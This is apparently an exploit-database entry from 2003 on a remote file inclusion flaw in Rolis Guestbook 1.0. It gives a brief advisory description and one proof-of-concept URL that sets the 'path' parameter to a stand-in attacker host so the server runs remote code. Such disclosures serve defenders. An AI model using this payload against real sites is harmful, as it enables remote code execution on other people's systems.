Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion
| EKU-ID: 28831 | CVE: | OSVDB-ID: |
| Author: RusH security team | Published: 2003-11-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28831 | CVE: | OSVDB-ID: |
| Author: RusH security team | Published: 2003-11-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9054/info It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well. http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/